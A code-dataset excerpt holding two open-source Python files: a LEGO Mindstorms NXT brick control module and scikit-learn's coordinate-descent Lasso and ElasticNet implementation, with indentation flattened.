Bobeye/LinkMechanismStewartGouph | OFWTP/nxt/brick.py | 21 | 6947 | # nxt.brick module -- Classes to represent LEGO Mindstorms NXT bricks
# Copyright (C) 2006 Douglas P Lau
# Copyright (C) 2009 Marcus Wanner, rhn
# Copyright (C) 2010 rhn, Marcus Wanner, zonedabone
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
from time import sleep
from threading import Lock
from nxt.error import FileNotFound, ModuleNotFound
from nxt.telegram import OPCODES, Telegram
from nxt.sensor import get_sensor
from nxt.motcont import MotCont
def _make_poller(opcode, poll_func, parse_func):
def poll(self, *args, **kwargs):
ogram = poll_func(opcode, *args, **kwargs)
with self.lock:
self.sock.send(str(ogram))
if ogram.reply:
igram = Telegram(opcode=opcode, pkt=self.sock.recv())
if ogram.reply:
return parse_func(igram)
else:
return None
return poll
class _Meta(type):
'Metaclass which adds one method for each telegram opcode'
def __init__(cls, name, bases, dict):
super(_Meta, cls).__init__(name, bases, dict)
for opcode in OPCODES:
poll_func, parse_func = OPCODES[opcode][0:2]
m = _make_poller(opcode, poll_func, parse_func)
try:
m.__doc__ = OPCODES[opcode][2]
except:
pass
setattr(cls, poll_func.__name__, m)
class FileFinder(object):
'A generator to find files on a NXT brick.'
def __init__(self, brick, pattern):
self.brick = brick
self.pattern = pattern
self.handle = None
def _close(self):
if self.handle is not None:
self.brick.close(self.handle)
self.handle = None
def __del__(self):
self._close()
def __iter__(self):
results = []
self.handle, fname, size = self.brick.find_first(self.pattern)
results.append((fname, size))
while True:
try:
handle, fname, size = self.brick.find_next(self.handle)
results.append((fname, size))
except FileNotFound:
self._close()
break
for result in results:
yield result
def File(brick, name, mode='r', size=None):
"""Opens a file for reading/writing. Mode is 'r' or 'w'. If mode is 'w',
size must be provided.
"""
if mode == 'w':
if size is not None:
return FileWriter(brick, name, size)
else:
return ValueError('Size not specified')
elif mode == 'r':
return FileReader(brick, name)
else:
return ValueError('Mode ' + str(mode) + ' not supported')
class FileReader(object):
"""Context manager to read a file on a NXT brick. Do use the iterator or
the read() method, but not both at the same time!
The iterator returns strings of an arbitrary (short) length.
"""
def __init__(self, brick, fname):
self.brick = brick
self.handle, self.size = brick.open_read(fname)
def read(self, bytes=None):
if bytes is not None:
remaining = bytes
else:
remaining = self.size
bsize = self.brick.sock.bsize
data = []
while remaining > 0:
handle, bsize, buffer_ = self.brick.read(self.handle,
min(bsize, remaining))
remaining -= len(buffer_)
data.append(buffer_)
return ''.join(data)
def close(self):
if self.handle is not None:
self.brick.close(self.handle)
self.handle = None
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, etp, value, tb):
self.close()
def __iter__(self):
rem = self.size
bsize = self.brick.sock.bsize
while rem > 0:
handle, bsize, data = self.brick.read(self.handle,
min(bsize, rem))
yield data
rem -= len(data)
class FileWriter(object):
"Object to write to a file on a NXT brick"
def __init__(self, brick, fname, size):
self.brick = brick
self.handle = self.brick.open_write(fname, size)
self._position = 0
self.size = size
def __del__(self):
self.close()
def close(self):
if self.handle is not None:
self.brick.close(self.handle)
self.handle = None
def tell(self):
return self._position
def write(self, data):
remaining = len(data)
if remaining > self.size - self._position:
raise ValueError('Data will not fit into remaining space')
bsize = self.brick.sock.bsize
data_position = 0
while remaining > 0:
batch_size = min(bsize, remaining)
next_data_position = data_position + batch_size
buffer_ = data[data_position:next_data_position]
handle, size = self.brick.write(self.handle, buffer_)
self._position += batch_size
data_position = next_data_position
remaining -= batch_size
class ModuleFinder(object):
'Iterator to lookup modules on a NXT brick'
def __init__(self, brick, pattern):
self.brick = brick
self.pattern = pattern
self.handle = None
def _close(self):
if self.handle:
self.brick.close(self.handle)
self.handle = None
def __del__(self):
self._close()
def __iter__(self):
self.handle, mname, mid, msize, miomap_size = \
self.brick.request_first_module(self.pattern)
yield (mname, mid, msize, miomap_size)
while True:
try:
handle, mname, mid, msize, miomap_size = \
self.brick.request_next_module(
self.handle)
yield (mname, mid, msize, miomap_size)
except ModuleNotFound:
self._close()
break
class Brick(object): #TODO: this begs to have explicit methods
'Main object for NXT Control'
__metaclass__ = _Meta
def __init__(self, sock):
self.sock = sock
self.lock = Lock()
self.mc = MotCont(self)
def play_tone_and_wait(self, frequency, duration):
self.play_tone(frequency, duration)
sleep(duration / 1000.0)
def __del__(self):
self.sock.close()
find_files = FileFinder
find_modules = ModuleFinder
open_file = File
get_sensor = get_sensor
| gpl-3.0 |
AlexRobson/scikit-learn | sklearn/linear_model/coordinate_descent.py | 37 | 74167 | # Author: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Fabian Pedregosa <fabian.pedregosa@inria.fr>
# Olivier Grisel <olivier.grisel@ensta.org>
# Gael Varoquaux <gael.varoquaux@inria.fr>
#
# License: BSD 3 clause
import sys
import warnings
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy import sparse
from .base import LinearModel, _pre_fit
from ..base import RegressorMixin
from .base import center_data, sparse_center_data
from ..utils import check_array, check_X_y, deprecated
from ..utils.validation import check_random_state
from ..cross_validation import check_cv
from ..externals.joblib import Parallel, delayed
from ..externals import six
from ..externals.six.moves import xrange
from ..utils.extmath import safe_sparse_dot
from ..utils.validation import check_is_fitted
from ..utils.validation import column_or_1d
from ..utils import ConvergenceWarning
from . import cd_fast
###############################################################################
# Paths functions
def _alpha_grid(X, y, Xy=None, l1_ratio=1.0, fit_intercept=True,
eps=1e-3, n_alphas=100, normalize=False, copy_X=True):
""" Compute the grid of alpha values for elastic net parameter search
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data. Pass directly as Fortran-contiguous data to avoid
unnecessary memory duplication
y : ndarray, shape (n_samples,)
Target values
Xy : array-like, optional
Xy = np.dot(X.T, y) that can be precomputed.
l1_ratio : float
The elastic net mixing parameter, with ``0 <= l1_ratio <= 1``.
For ``l1_ratio = 0`` the penalty is an L2 penalty. ``For
l1_ratio = 1`` it is an L1 penalty. For ``0 < l1_ratio <
1``, the penalty is a combination of L1 and L2.
eps : float, optional
Length of the path. ``eps=1e-3`` means that
``alpha_min / alpha_max = 1e-3``
n_alphas : int, optional
Number of alphas along the regularization path
fit_intercept : boolean, default True
Whether to fit an intercept or not
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
"""
n_samples = len(y)
sparse_center = False
if Xy is None:
X_sparse = sparse.isspmatrix(X)
sparse_center = X_sparse and (fit_intercept or normalize)
X = check_array(X, 'csc',
copy=(copy_X and fit_intercept and not X_sparse))
if not X_sparse:
# X can be touched inplace thanks to the above line
X, y, _, _, _ = center_data(X, y, fit_intercept,
normalize, copy=False)
Xy = safe_sparse_dot(X.T, y, dense_output=True)
if sparse_center:
# Workaround to find alpha_max for sparse matrices.
# since we should not destroy the sparsity of such matrices.
_, _, X_mean, _, X_std = sparse_center_data(X, y, fit_intercept,
normalize)
mean_dot = X_mean * np.sum(y)
if Xy.ndim == 1:
Xy = Xy[:, np.newaxis]
if sparse_center:
if fit_intercept:
Xy -= mean_dot[:, np.newaxis]
if normalize:
Xy /= X_std[:, np.newaxis]
alpha_max = (np.sqrt(np.sum(Xy ** 2, axis=1)).max() /
(n_samples * l1_ratio))
if alpha_max <= np.finfo(float).resolution:
alphas = np.empty(n_alphas)
alphas.fill(np.finfo(float).resolution)
return alphas
return np.logspace(np.log10(alpha_max * eps), np.log10(alpha_max),
num=n_alphas)[::-1]
def lasso_path(X, y, eps=1e-3, n_alphas=100, alphas=None,
precompute='auto', Xy=None, copy_X=True, coef_init=None,
verbose=False, return_n_iter=False, positive=False, **params):
"""Compute Lasso path with coordinate descent
The Lasso optimization function varies for mono and multi-outputs.
For mono-output tasks it is::
(1 / (2 * n_samples)) * ||y - Xw||^2_2 + alpha * ||w||_1
For multi-output tasks it is::
(1 / (2 * n_samples)) * ||Y - XW||^2_Fro + alpha * ||W||_21
Where::
||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}
i.e. the sum of norm of each row.
Read more in the :ref:`User Guide <lasso>`.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data. Pass directly as Fortran-contiguous data to avoid
unnecessary memory duplication. If ``y`` is mono-output then ``X``
can be sparse.
y : ndarray, shape (n_samples,), or (n_samples, n_outputs)
Target values
eps : float, optional
Length of the path. ``eps=1e-3`` means that
``alpha_min / alpha_max = 1e-3``
n_alphas : int, optional
Number of alphas along the regularization path
alphas : ndarray, optional
List of alphas where to compute the models.
If ``None`` alphas are set automatically
precompute : True | False | 'auto' | array-like
Whether to use a precomputed Gram matrix to speed up
calculations. If set to ``'auto'`` let us decide. The Gram
matrix can also be passed as argument.
Xy : array-like, optional
Xy = np.dot(X.T, y) that can be precomputed. It is useful
only when the Gram matrix is precomputed.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
coef_init : array, shape (n_features, ) | None
The initial values of the coefficients.
verbose : bool or integer
Amount of verbosity.
params : kwargs
keyword arguments passed to the coordinate descent solver.
positive : bool, default False
If set to True, forces coefficients to be positive.
return_n_iter : bool
whether to return the number of iterations or not.
Returns
-------
alphas : array, shape (n_alphas,)
The alphas along the path where models are computed.
coefs : array, shape (n_features, n_alphas) or \
(n_outputs, n_features, n_alphas)
Coefficients along the path.
dual_gaps : array, shape (n_alphas,)
The dual gaps at the end of the optimization for each alpha.
n_iters : array-like, shape (n_alphas,)
The number of iterations taken by the coordinate descent optimizer to
reach the specified tolerance for each alpha.
Notes
-----
See examples/linear_model/plot_lasso_coordinate_descent_path.py
for an example.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
Note that in certain cases, the Lars solver may be significantly
faster to implement this functionality. In particular, linear
interpolation can be used to retrieve model coefficients between the
values output by lars_path
Examples
---------
Comparing lasso_path and lars_path with interpolation:
>>> X = np.array([[1, 2, 3.1], [2.3, 5.4, 4.3]]).T
>>> y = np.array([1, 2, 3.1])
>>> # Use lasso_path to compute a coefficient path
>>> _, coef_path, _ = lasso_path(X, y, alphas=[5., 1., .5])
>>> print(coef_path)
[[ 0. 0. 0.46874778]
[ 0.2159048 0.4425765 0.23689075]]
>>> # Now use lars_path and 1D linear interpolation to compute the
>>> # same path
>>> from sklearn.linear_model import lars_path
>>> alphas, active, coef_path_lars = lars_path(X, y, method='lasso')
>>> from scipy import interpolate
>>> coef_path_continuous = interpolate.interp1d(alphas[::-1],
... coef_path_lars[:, ::-1])
>>> print(coef_path_continuous([5., 1., .5]))
[[ 0. 0. 0.46915237]
[ 0.2159048 0.4425765 0.23668876]]
See also
--------
lars_path
Lasso
LassoLars
LassoCV
LassoLarsCV
sklearn.decomposition.sparse_encode
"""
return enet_path(X, y, l1_ratio=1., eps=eps, n_alphas=n_alphas,
alphas=alphas, precompute=precompute, Xy=Xy,
copy_X=copy_X, coef_init=coef_init, verbose=verbose,
positive=positive, **params)
def enet_path(X, y, l1_ratio=0.5, eps=1e-3, n_alphas=100, alphas=None,
precompute='auto', Xy=None, copy_X=True, coef_init=None,
verbose=False, return_n_iter=False, positive=False, **params):
"""Compute elastic net path with coordinate descent
The elastic net optimization function varies for mono and multi-outputs.
For mono-output tasks it is::
1 / (2 * n_samples) * ||y - Xw||^2_2 +
+ alpha * l1_ratio * ||w||_1
+ 0.5 * alpha * (1 - l1_ratio) * ||w||^2_2
For multi-output tasks it is::
(1 / (2 * n_samples)) * ||Y - XW||^Fro_2
+ alpha * l1_ratio * ||W||_21
+ 0.5 * alpha * (1 - l1_ratio) * ||W||_Fro^2
Where::
||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}
i.e. the sum of norm of each row.
Read more in the :ref:`User Guide <elastic_net>`.
Parameters
----------
X : {array-like}, shape (n_samples, n_features)
Training data. Pass directly as Fortran-contiguous data to avoid
unnecessary memory duplication. If ``y`` is mono-output then ``X``
can be sparse.
y : ndarray, shape (n_samples,) or (n_samples, n_outputs)
Target values
l1_ratio : float, optional
float between 0 and 1 passed to elastic net (scaling between
l1 and l2 penalties). ``l1_ratio=1`` corresponds to the Lasso
eps : float
Length of the path. ``eps=1e-3`` means that
``alpha_min / alpha_max = 1e-3``
n_alphas : int, optional
Number of alphas along the regularization path
alphas : ndarray, optional
List of alphas where to compute the models.
If None alphas are set automatically
precompute : True | False | 'auto' | array-like
Whether to use a precomputed Gram matrix to speed up
calculations. If set to ``'auto'`` let us decide. The Gram
matrix can also be passed as argument.
Xy : array-like, optional
Xy = np.dot(X.T, y) that can be precomputed. It is useful
only when the Gram matrix is precomputed.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
coef_init : array, shape (n_features, ) | None
The initial values of the coefficients.
verbose : bool or integer
Amount of verbosity.
params : kwargs
keyword arguments passed to the coordinate descent solver.
return_n_iter : bool
whether to return the number of iterations or not.
positive : bool, default False
If set to True, forces coefficients to be positive.
Returns
-------
alphas : array, shape (n_alphas,)
The alphas along the path where models are computed.
coefs : array, shape (n_features, n_alphas) or \
(n_outputs, n_features, n_alphas)
Coefficients along the path.
dual_gaps : array, shape (n_alphas,)
The dual gaps at the end of the optimization for each alpha.
n_iters : array-like, shape (n_alphas,)
The number of iterations taken by the coordinate descent optimizer to
reach the specified tolerance for each alpha.
(Is returned when ``return_n_iter`` is set to True).
Notes
-----
See examples/plot_lasso_coordinate_descent_path.py for an example.
See also
--------
MultiTaskElasticNet
MultiTaskElasticNetCV
ElasticNet
ElasticNetCV
"""
X = check_array(X, 'csc', dtype=np.float64, order='F', copy=copy_X)
y = check_array(y, 'csc', dtype=np.float64, order='F', copy=False, ensure_2d=False)
if Xy is not None:
Xy = check_array(Xy, 'csc', dtype=np.float64, order='F', copy=False,
ensure_2d=False)
n_samples, n_features = X.shape
multi_output = False
if y.ndim != 1:
multi_output = True
_, n_outputs = y.shape
# MultiTaskElasticNet does not support sparse matrices
if not multi_output and sparse.isspmatrix(X):
if 'X_mean' in params:
# As sparse matrices are not actually centered we need this
# to be passed to the CD solver.
X_sparse_scaling = params['X_mean'] / params['X_std']
else:
X_sparse_scaling = np.zeros(n_features)
# X should be normalized and fit already.
X, y, X_mean, y_mean, X_std, precompute, Xy = \
_pre_fit(X, y, Xy, precompute, normalize=False, fit_intercept=False,
copy=False)
if alphas is None:
# No need to normalize of fit_intercept: it has been done
# above
alphas = _alpha_grid(X, y, Xy=Xy, l1_ratio=l1_ratio,
fit_intercept=False, eps=eps, n_alphas=n_alphas,
normalize=False, copy_X=False)
else:
alphas = np.sort(alphas)[::-1] # make sure alphas are properly ordered
n_alphas = len(alphas)
tol = params.get('tol', 1e-4)
max_iter = params.get('max_iter', 1000)
dual_gaps = np.empty(n_alphas)
n_iters = []
rng = check_random_state(params.get('random_state', None))
selection = params.get('selection', 'cyclic')
if selection not in ['random', 'cyclic']:
raise ValueError("selection should be either random or cyclic.")
random = (selection == 'random')
if not multi_output:
coefs = np.empty((n_features, n_alphas), dtype=np.float64)
else:
coefs = np.empty((n_outputs, n_features, n_alphas),
dtype=np.float64)
if coef_init is None:
coef_ = np.asfortranarray(np.zeros(coefs.shape[:-1]))
else:
coef_ = np.asfortranarray(coef_init)
for i, alpha in enumerate(alphas):
l1_reg = alpha * l1_ratio * n_samples
l2_reg = alpha * (1.0 - l1_ratio) * n_samples
if not multi_output and sparse.isspmatrix(X):
model = cd_fast.sparse_enet_coordinate_descent(
coef_, l1_reg, l2_reg, X.data, X.indices,
X.indptr, y, X_sparse_scaling,
max_iter, tol, rng, random, positive)
elif multi_output:
model = cd_fast.enet_coordinate_descent_multi_task(
coef_, l1_reg, l2_reg, X, y, max_iter, tol, rng, random)
elif isinstance(precompute, np.ndarray):
precompute = check_array(precompute, 'csc', dtype=np.float64, order='F')
model = cd_fast.enet_coordinate_descent_gram(
coef_, l1_reg, l2_reg, precompute, Xy, y, max_iter,
tol, rng, random, positive)
elif precompute is False:
model = cd_fast.enet_coordinate_descent(
coef_, l1_reg, l2_reg, X, y, max_iter, tol, rng, random,
positive)
else:
raise ValueError("Precompute should be one of True, False, "
"'auto' or array-like")
coef_, dual_gap_, eps_, n_iter_ = model
coefs[..., i] = coef_
dual_gaps[i] = dual_gap_
n_iters.append(n_iter_)
if dual_gap_ > eps_:
warnings.warn('Objective did not converge.' +
' You might want' +
' to increase the number of iterations',
ConvergenceWarning)
if verbose:
if verbose > 2:
print(model)
elif verbose > 1:
print('Path: %03i out of %03i' % (i, n_alphas))
else:
sys.stderr.write('.')
if return_n_iter:
return alphas, coefs, dual_gaps, n_iters
return alphas, coefs, dual_gaps
###############################################################################
# ElasticNet model
class ElasticNet(LinearModel, RegressorMixin):
"""Linear regression with combined L1 and L2 priors as regularizer.
Minimizes the objective function::
1 / (2 * n_samples) * ||y - Xw||^2_2 +
+ alpha * l1_ratio * ||w||_1
+ 0.5 * alpha * (1 - l1_ratio) * ||w||^2_2
If you are interested in controlling the L1 and L2 penalty
separately, keep in mind that this is equivalent to::
a * L1 + b * L2
where::
alpha = a + b and l1_ratio = a / (a + b)
The parameter l1_ratio corresponds to alpha in the glmnet R package while
alpha corresponds to the lambda parameter in glmnet. Specifically, l1_ratio
= 1 is the lasso penalty. Currently, l1_ratio <= 0.01 is not reliable,
unless you supply your own sequence of alpha.
Read more in the :ref:`User Guide <elastic_net>`.
Parameters
----------
alpha : float
Constant that multiplies the penalty terms. Defaults to 1.0
See the notes for the exact mathematical meaning of this
parameter.
``alpha = 0`` is equivalent to an ordinary least square, solved
by the :class:`LinearRegression` object. For numerical
reasons, using ``alpha = 0`` with the Lasso object is not advised
and you should prefer the LinearRegression object.
l1_ratio : float
The ElasticNet mixing parameter, with ``0 <= l1_ratio <= 1``. For
``l1_ratio = 0`` the penalty is an L2 penalty. ``For l1_ratio = 1`` it
is an L1 penalty. For ``0 < l1_ratio < 1``, the penalty is a
combination of L1 and L2.
fit_intercept : bool
Whether the intercept should be estimated or not. If ``False``, the
data is assumed to be already centered.
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
precompute : True | False | 'auto' | array-like
Whether to use a precomputed Gram matrix to speed up
calculations. If set to ``'auto'`` let us decide. The Gram
matrix can also be passed as argument. For sparse input
this option is always ``True`` to preserve sparsity.
WARNING : The ``'auto'`` option is deprecated and will
be removed in 0.18.
max_iter : int, optional
The maximum number of iterations
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
tol : float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
warm_start : bool, optional
When set to ``True``, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
positive : bool, optional
When set to ``True``, forces the coefficients to be positive.
selection : str, default 'cyclic'
If set to 'random', a random coefficient is updated every iteration
rather than looping over features sequentially by default. This
(setting to 'random') often leads to significantly faster convergence
especially when tol is higher than 1e-4.
random_state : int, RandomState instance, or None (default)
The seed of the pseudo random number generator that selects
a random feature to update. Useful only when selection is set to
'random'.
Attributes
----------
coef_ : array, shape (n_features,) | (n_targets, n_features)
parameter vector (w in the cost function formula)
sparse_coef_ : scipy.sparse matrix, shape (n_features, 1) | \
(n_targets, n_features)
``sparse_coef_`` is a readonly property derived from ``coef_``
intercept_ : float | array, shape (n_targets,)
independent term in decision function.
n_iter_ : array-like, shape (n_targets,)
number of iterations run by the coordinate descent solver to reach
the specified tolerance.
Notes
-----
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
See also
--------
SGDRegressor: implements elastic net regression with incremental training.
SGDClassifier: implements logistic regression with elastic net penalty
(``SGDClassifier(loss="log", penalty="elasticnet")``).
"""
path = staticmethod(enet_path)
def __init__(self, alpha=1.0, l1_ratio=0.5, fit_intercept=True,
normalize=False, precompute=False, max_iter=1000,
copy_X=True, tol=1e-4, warm_start=False, positive=False,
random_state=None, selection='cyclic'):
self.alpha = alpha
self.l1_ratio = l1_ratio
self.coef_ = None
self.fit_intercept = fit_intercept
self.normalize = normalize
self.precompute = precompute
self.max_iter = max_iter
self.copy_X = copy_X
self.tol = tol
self.warm_start = warm_start
self.positive = positive
self.intercept_ = 0.0
self.random_state = random_state
self.selection = selection
def fit(self, X, y):
"""Fit model with coordinate descent.
Parameters
-----------
X : ndarray or scipy.sparse matrix, (n_samples, n_features)
Data
y : ndarray, shape (n_samples,) or (n_samples, n_targets)
Target
Notes
-----
Coordinate descent is an algorithm that considers each column of
data at a time hence it will automatically convert the X input
as a Fortran-contiguous numpy array if necessary.
To avoid memory re-allocation it is advised to allocate the
initial data in memory directly using that format.
"""
if self.alpha == 0:
warnings.warn("With alpha=0, this algorithm does not converge "
"well. You are advised to use the LinearRegression "
"estimator", stacklevel=2)
if self.precompute == 'auto':
warnings.warn("Setting precompute to 'auto', was found to be "
"slower even when n_samples > n_features. Hence "
"it will be removed in 0.18.",
DeprecationWarning, stacklevel=2)
X, y = check_X_y(X, y, accept_sparse='csc', dtype=np.float64,
order='F', copy=self.copy_X and self.fit_intercept,
multi_output=True, y_numeric=True)
X, y, X_mean, y_mean, X_std, precompute, Xy = \
_pre_fit(X, y, None, self.precompute, self.normalize,
self.fit_intercept, copy=True)
if y.ndim == 1:
y = y[:, np.newaxis]
if Xy is not None and Xy.ndim == 1:
Xy = Xy[:, np.newaxis]
n_samples, n_features = X.shape
n_targets = y.shape[1]
if self.selection not in ['cyclic', 'random']:
raise ValueError("selection should be either random or cyclic.")
if not self.warm_start or self.coef_ is None:
coef_ = np.zeros((n_targets, n_features), dtype=np.float64,
order='F')
else:
coef_ = self.coef_
if coef_.ndim == 1:
coef_ = coef_[np.newaxis, :]
dual_gaps_ = np.zeros(n_targets, dtype=np.float64)
self.n_iter_ = []
for k in xrange(n_targets):
if Xy is not None:
this_Xy = Xy[:, k]
else:
this_Xy = None
_, this_coef, this_dual_gap, this_iter = \
self.path(X, y[:, k],
l1_ratio=self.l1_ratio, eps=None,
n_alphas=None, alphas=[self.alpha],
precompute=precompute, Xy=this_Xy,
fit_intercept=False, normalize=False, copy_X=True,
verbose=False, tol=self.tol, positive=self.positive,
X_mean=X_mean, X_std=X_std, return_n_iter=True,
coef_init=coef_[k], max_iter=self.max_iter,
random_state=self.random_state,
selection=self.selection)
coef_[k] = this_coef[:, 0]
dual_gaps_[k] = this_dual_gap[0]
self.n_iter_.append(this_iter[0])
if n_targets == 1:
self.n_iter_ = self.n_iter_[0]
self.coef_, self.dual_gap_ = map(np.squeeze, [coef_, dual_gaps_])
self._set_intercept(X_mean, y_mean, X_std)
# return self for chaining fit and predict calls
return self
@property
def sparse_coef_(self):
""" sparse representation of the fitted coef """
return sparse.csr_matrix(self.coef_)
@deprecated(" and will be removed in 0.19")
def decision_function(self, X):
"""Decision function of the linear model
Parameters
----------
X : numpy array or scipy.sparse matrix of shape (n_samples, n_features)
Returns
-------
T : array, shape (n_samples,)
The predicted decision function
"""
return self._decision_function(X)
def _decision_function(self, X):
"""Decision function of the linear model
Parameters
----------
X : numpy array or scipy.sparse matrix of shape (n_samples, n_features)
Returns
-------
T : array, shape (n_samples,)
The predicted decision function
"""
check_is_fitted(self, 'n_iter_')
if sparse.isspmatrix(X):
return np.ravel(safe_sparse_dot(self.coef_, X.T, dense_output=True)
+ self.intercept_)
else:
return super(ElasticNet, self)._decision_function(X)
###############################################################################
# Lasso model
class Lasso(ElasticNet):
"""Linear Model trained with L1 prior as regularizer (aka the Lasso)
The optimization objective for Lasso is::
(1 / (2 * n_samples)) * ||y - Xw||^2_2 + alpha * ||w||_1
Technically the Lasso model is optimizing the same objective function as
the Elastic Net with ``l1_ratio=1.0`` (no L2 penalty).
Read more in the :ref:`User Guide <lasso>`.
Parameters
----------
alpha : float, optional
Constant that multiplies the L1 term. Defaults to 1.0.
``alpha = 0`` is equivalent to an ordinary least square, solved
by the :class:`LinearRegression` object. For numerical
reasons, using ``alpha = 0`` is with the Lasso object is not advised
and you should prefer the LinearRegression object.
fit_intercept : boolean
whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional, default False
If ``True``, the regressors X will be normalized before regression.
copy_X : boolean, optional, default True
If ``True``, X will be copied; else, it may be overwritten.
precompute : True | False | 'auto' | array-like
Whether to use a precomputed Gram matrix to speed up
calculations. If set to ``'auto'`` let us decide. The Gram
matrix can also be passed as argument. For sparse input
this option is always ``True`` to preserve sparsity.
WARNING : The ``'auto'`` option is deprecated and will
be removed in 0.18.
max_iter : int, optional
The maximum number of iterations
tol : float, optional
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
warm_start : bool, optional
When set to True, reuse the solution of the previous call to fit as
initialization, otherwise, just erase the previous solution.
positive : bool, optional
When set to ``True``, forces the coefficients to be positive.
selection : str, default 'cyclic'
If set to 'random', a random coefficient is updated every iteration
rather than looping over features sequentially by default. This
(setting to 'random') often leads to significantly faster convergence
especially when tol is higher than 1e-4.
random_state : int, RandomState instance, or None (default)
The seed of the pseudo random number generator that selects
a random feature to update. Useful only when selection is set to
'random'.
Attributes
----------
coef_ : array, shape (n_features,) | (n_targets, n_features)
parameter vector (w in the cost function formula)
sparse_coef_ : scipy.sparse matrix, shape (n_features, 1) | \
(n_targets, n_features)
``sparse_coef_`` is a readonly property derived from ``coef_``
intercept_ : float | array, shape (n_targets,)
independent term in decision function.
n_iter_ : int | array-like, shape (n_targets,)
number of iterations run by the coordinate descent solver to reach
the specified tolerance.
Examples
--------
>>> from sklearn import linear_model
>>> clf = linear_model.Lasso(alpha=0.1)
>>> clf.fit([[0,0], [1, 1], [2, 2]], [0, 1, 2])
Lasso(alpha=0.1, copy_X=True, fit_intercept=True, max_iter=1000,
normalize=False, positive=False, precompute=False, random_state=None,
selection='cyclic', tol=0.0001, warm_start=False)
>>> print(clf.coef_)
[ 0.85 0. ]
>>> print(clf.intercept_)
0.15
See also
--------
lars_path
lasso_path
LassoLars
LassoCV
LassoLarsCV
sklearn.decomposition.sparse_encode
Notes
-----
The algorithm used to fit the model is coordinate descent.
To avoid unnecessary memory duplication the X argument of the fit method
should be directly passed as a Fortran-contiguous numpy array.
"""
path = staticmethod(enet_path)
def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
precompute=False, copy_X=True, max_iter=1000,
tol=1e-4, warm_start=False, positive=False,
random_state=None, selection='cyclic'):
super(Lasso, self).__init__(
alpha=alpha, l1_ratio=1.0, fit_intercept=fit_intercept,
normalize=normalize, precompute=precompute, copy_X=copy_X,
max_iter=max_iter, tol=tol, warm_start=warm_start,
positive=positive, random_state=random_state,
selection=selection)
###############################################################################
# Functions for CV with paths functions
def _path_residuals(X, y, train, test, path, path_params, alphas=None,
l1_ratio=1, X_order=None, dtype=None):
"""Returns the MSE for the models computed by 'path'
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data.
y : array-like, shape (n_samples,) or (n_samples, n_targets)
Target values
train : list of indices
The indices of the train set
test : list of indices
The indices of the test set
path : callable
function returning a list of models on the path. See
enet_path for an example of signature
path_params : dictionary
Parameters passed to the path function
alphas : array-like, optional
Array of float that is used for cross-validation. If not
provided, computed using 'path'
l1_ratio : float, optional
float between 0 and 1 passed to ElasticNet (scaling between
l1 and l2 penalties). For ``l1_ratio = 0`` the penalty is an
L2 penalty. For ``l1_ratio = 1`` it is an L1 penalty. For ``0
< l1_ratio < 1``, the penalty is a combination of L1 and L2
X_order : {'F', 'C', or None}, optional
The order of the arrays expected by the path function to
avoid memory copies
dtype : a numpy dtype or None
The dtype of the arrays expected by the path function to
avoid memory copies
"""
X_train = X[train]
y_train = y[train]
X_test = X[test]
y_test = y[test]
fit_intercept = path_params['fit_intercept']
normalize = path_params['normalize']
if y.ndim == 1:
precompute = path_params['precompute']
else:
# No Gram variant of multi-task exists right now.
# Fall back to default enet_multitask
precompute = False
X_train, y_train, X_mean, y_mean, X_std, precompute, Xy = \
_pre_fit(X_train, y_train, None, precompute, normalize, fit_intercept,
copy=False)
path_params = path_params.copy()
path_params['Xy'] = Xy
path_params['X_mean'] = X_mean
path_params['X_std'] = X_std
path_params['precompute'] = precompute
path_params['copy_X'] = False
path_params['alphas'] = alphas
if 'l1_ratio' in path_params:
path_params['l1_ratio'] = l1_ratio
# Do the ordering and type casting here, as if it is done in the path,
# X is copied and a reference is kept here
X_train = check_array(X_train, 'csc', dtype=dtype, order=X_order)
alphas, coefs, _ = path(X_train, y_train, **path_params)
del X_train, y_train
if y.ndim == 1:
# Doing this so that it becomes coherent with multioutput.
coefs = coefs[np.newaxis, :, :]
y_mean = np.atleast_1d(y_mean)
y_test = y_test[:, np.newaxis]
if normalize:
nonzeros = np.flatnonzero(X_std)
coefs[:, nonzeros] /= X_std[nonzeros][:, np.newaxis]
intercepts = y_mean[:, np.newaxis] - np.dot(X_mean, coefs)
if sparse.issparse(X_test):
n_order, n_features, n_alphas = coefs.shape
# Work around for sparse matices since coefs is a 3-D numpy array.
coefs_feature_major = np.rollaxis(coefs, 1)
feature_2d = np.reshape(coefs_feature_major, (n_features, -1))
X_test_coefs = safe_sparse_dot(X_test, feature_2d)
X_test_coefs = X_test_coefs.reshape(X_test.shape[0], n_order, -1)
else:
X_test_coefs = safe_sparse_dot(X_test, coefs)
residues = X_test_coefs - y_test[:, :, np.newaxis]
residues += intercepts
this_mses = ((residues ** 2).mean(axis=0)).mean(axis=0)
return this_mses
